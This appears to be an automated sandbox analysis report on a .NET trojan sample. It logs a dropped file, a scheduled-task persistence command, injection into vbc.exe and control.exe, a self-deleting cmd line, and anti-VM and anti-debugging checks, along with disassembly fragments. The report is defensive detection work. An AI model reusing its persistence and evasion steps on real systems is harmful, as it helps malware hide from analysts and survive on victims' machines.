Source: JcEEHoQdnETCO.exe.0.dr, ParentalControl/ParentalControl.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 0.2.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: J0OmHIagw8.exe, ParentalControl/ParentalControl.cs	Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: J0OmHIagw8.exe, ParentalControl/ParentalControl.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: J0OmHIagw8.exe, ParentalControl/ParentalControl.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.0.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
Source: 0.0.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.0.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.evad.winEXE@12/3@20/11

Source: C:\Users\user\Desktop\J0OmHIagw8.exe

File created: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe

Jump to behavior

Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Mutant created: \Sessions\1\BaseNamedObjects\BrtavqaRGzDKtjCLSCLufFEEs
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4552:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_01

Source: C:\Users\user\Desktop\J0OmHIagw8.exe

File created: C:\Users\user\AppData\Local\Temp\tmpF65F.tmp

Jump to behavior

Source: J0OmHIagw8.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\J0OmHIagw8.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\J0OmHIagw8.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\J0OmHIagw8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: J0OmHIagw8.exe

Virustotal: Detection: 31%

Source: C:\Users\user\Desktop\J0OmHIagw8.exe

File read: C:\Users\user\Desktop\J0OmHIagw8.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\J0OmHIagw8.exe 'C:\Users\user\Desktop\J0OmHIagw8.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
Source: unknown	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'	Jump to behavior

Source: C:\Users\user\Desktop\J0OmHIagw8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\J0OmHIagw8.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: J0OmHIagw8.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: J0OmHIagw8.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: J0OmHIagw8.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: control.pdb source: vbc.exe, 00000005.00000002.275978124.0000000005108000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: vbc.exe, 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, control.exe, 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, control.exe
Source:	Binary string: vbc.pdb source: control.exe, 00000008.00000002.576699588.00000000055C7000.00000004.00000001.sdmp
Source:	Binary string: control.pdbUGP source: vbc.exe, 00000005.00000002.275978124.0000000005108000.00000004.00000020.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: J0OmHIagw8.exe, ParentalControl/ParentalControl.cs	.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: JcEEHoQdnETCO.exe.0.dr, ParentalControl/ParentalControl.cs	.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs	.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs	.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Binary contains a suspicious time stamp

Show sources

Source: initial sample

Static PE information: 0x8C6CE96A [Sat Aug 27 21:58:02 2044 UTC]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0041508E push ebp; iretd	5_2_0041508F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0041C9C8 push dword ptr [ECF9F4C6h]; ret	5_2_0041C9EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0040C2CA push ds; retf	5_2_0040C2E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0040C31A push ds; retf	5_2_0040C31E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_004153DF pushad ; ret	5_2_004153E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0041B3B5 push eax; ret	5_2_0041B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0041B46C push eax; ret	5_2_0041B472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0041B402 push eax; ret	5_2_0041B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0041B40B push eax; ret	5_2_0041B472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_00414DDA pushfd ; retf	5_2_00414DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0040EEAA push esp; retf	5_2_0040EEAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0541D0D1 push ecx; ret	5_2_0541D0E4
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E6D0D1 push ecx; ret	8_2_04E6D0E4
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_030FC31A push ds; retf	8_2_030FC31E
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0310B3B5 push eax; ret	8_2_0310B408
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_031053DF pushad ; ret	8_2_031053E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_030FC2CA push ds; retf	8_2_030FC2E5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0310C9C8 push dword ptr [ECF9F4C6h]; ret	8_2_0310C9EA
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0310508E push ebp; iretd	8_2_0310508F
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_030FEEAA push esp; retf	8_2_030FEEAF
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_03104DDA pushfd ; retf	8_2_03104DDB
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0310B402 push eax; ret	8_2_0310B408
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0310B40B push eax; ret	8_2_0310B472
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0310B46C push eax; ret	8_2_0310B472

Source: initial sample	Static PE information: section name: .text entropy: 7.87325624696
Source: initial sample	Static PE information: section name: .text entropy: 7.87325624696

Source: C:\Users\user\Desktop\J0OmHIagw8.exe

File created: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'

Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match

File source: Process Memory Space: J0OmHIagw8.exe PID: 5816, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 00000000030F85E4 second address: 00000000030F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 00000000030F897E second address: 00000000030F8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\J0OmHIagw8.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 5_2_004088B0 rdtsc

5_2_004088B0

Source: C:\Users\user\Desktop\J0OmHIagw8.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\J0OmHIagw8.exe TID: 5328	Thread sleep time: -31500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe TID: 4112	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6624	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 6404	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 6404	Thread sleep time: -66000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: J0OmHIagw8.exe, 00000000.00000002.238812639.00000000032D5000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: explorer.exe, 00000006.00000000.259002702.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000006.00000000.259002702.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000006.00000000.258484663.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000006.00000000.258703934.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: control.exe, 00000008.00000002.570842629.0000000000D14000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmp	Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.251327827.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000006.00000000.259002702.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000006.00000000.259002702.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000006.00000000.259244656.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000006.00000000.251346760.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: J0OmHIagw8.exe, 00000000.00000002.238812639.00000000032D5000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.258484663.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000006.00000000.258484663.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: J0OmHIagw8.exe, 00000000.00000002.238812639.00000000032D5000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: J0OmHIagw8.exe, 00000000.00000002.238812639.00000000032D5000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: J0OmHIagw8.exe, 00000000.00000002.238812639.00000000032D5000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmp	Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000006.00000000.258484663.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\J0OmHIagw8.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 5_2_004088B0 rdtsc

5_2_004088B0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 5_2_00409B20 LdrLoadDll,

5_2_00409B20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05403D43 mov eax, dword ptr fs:[00000030h]	5_2_05403D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F4D3B mov eax, dword ptr fs:[00000030h]	5_2_053F4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F4D3B mov eax, dword ptr fs:[00000030h]	5_2_053F4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F4D3B mov eax, dword ptr fs:[00000030h]	5_2_053F4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05443540 mov eax, dword ptr fs:[00000030h]	5_2_05443540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05473D40 mov eax, dword ptr fs:[00000030h]	5_2_05473D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]	5_2_053D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]	5_2_053D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]	5_2_053D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]	5_2_053D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]	5_2_053D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]	5_2_053D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]	5_2_053D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]	5_2_053D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]	5_2_053D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]	5_2_053D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]	5_2_053D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]	5_2_053D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D3D34 mov eax, dword ptr fs:[00000030h]	5_2_053D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053CAD30 mov eax, dword ptr fs:[00000030h]	5_2_053CAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053EC577 mov eax, dword ptr fs:[00000030h]	5_2_053EC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053EC577 mov eax, dword ptr fs:[00000030h]	5_2_053EC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053E7D50 mov eax, dword ptr fs:[00000030h]	5_2_053E7D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0548E539 mov eax, dword ptr fs:[00000030h]	5_2_0548E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0544A537 mov eax, dword ptr fs:[00000030h]	5_2_0544A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05498D34 mov eax, dword ptr fs:[00000030h]	5_2_05498D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F1DB5 mov eax, dword ptr fs:[00000030h]	5_2_053F1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F1DB5 mov eax, dword ptr fs:[00000030h]	5_2_053F1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F1DB5 mov eax, dword ptr fs:[00000030h]	5_2_053F1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05446DC9 mov eax, dword ptr fs:[00000030h]	5_2_05446DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05446DC9 mov eax, dword ptr fs:[00000030h]	5_2_05446DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05446DC9 mov eax, dword ptr fs:[00000030h]	5_2_05446DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05446DC9 mov ecx, dword ptr fs:[00000030h]	5_2_05446DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05446DC9 mov eax, dword ptr fs:[00000030h]	5_2_05446DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05446DC9 mov eax, dword ptr fs:[00000030h]	5_2_05446DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F35A1 mov eax, dword ptr fs:[00000030h]	5_2_053F35A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053FFD9B mov eax, dword ptr fs:[00000030h]	5_2_053FFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053FFD9B mov eax, dword ptr fs:[00000030h]	5_2_053FFD9B
